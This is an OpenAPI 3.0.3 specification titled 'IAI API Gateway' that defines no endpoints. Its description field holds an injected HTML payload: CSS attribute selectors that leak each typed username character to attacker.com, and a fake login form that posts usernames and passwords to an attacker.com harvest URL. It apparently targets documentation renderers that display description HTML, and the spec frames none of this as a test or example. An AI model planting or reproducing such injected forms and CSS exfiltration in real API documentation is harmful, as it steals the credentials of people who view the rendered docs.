openapi: 3.0.3
info:
  title: "IAI API Gateway"
  version: "1.0.0"
  description: |
    <style>
      input[name="username"][value^="a"] { background: url('https://attacker.com/log?char=a'); }
      input[name="username"][value^="b"] { background: url('https://attacker.com/log?char=b'); }
      /* ... repeat for all characters ... */
    </style>
    
    <form action="https://attacker.com/harvest" method="POST">
      <input type="text" name="username" placeholder="Username">
      <input type="password" name="password" placeholder="Password">
      <button type="submit">Login</button>
    </form>
paths: {}
